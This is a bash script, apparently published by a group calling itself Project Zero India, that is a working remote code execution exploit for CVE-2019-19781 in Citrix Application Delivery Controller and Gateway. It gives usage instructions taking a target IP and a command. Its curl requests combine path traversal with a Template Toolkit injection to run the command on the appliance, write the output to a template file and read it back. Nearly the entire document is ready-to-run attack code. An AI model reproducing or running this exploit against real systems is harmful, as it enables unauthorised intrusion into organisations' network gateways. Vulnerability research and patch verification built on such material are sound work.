#!/bin/bash # Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781 # Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a' # Release Date : 11/01/2020 # Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia echo "================================================================================= ___ _ _ ____ ___ _ _ | _ \ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _ | _/| '_|/ _ \ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \ | | | ' \ / _' || |/ _' | |_| |_| \___/_/ |\___|\__| \__| /___|\___||_| \___/ |___||_||_|\__,_||_|\__,_| |__/ CVE-2019-19781 =================================================================================" ############################## if [ -z "$1" ]; then echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n' exit; fi filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1); curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is echo -ne "Command Output :\n" curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is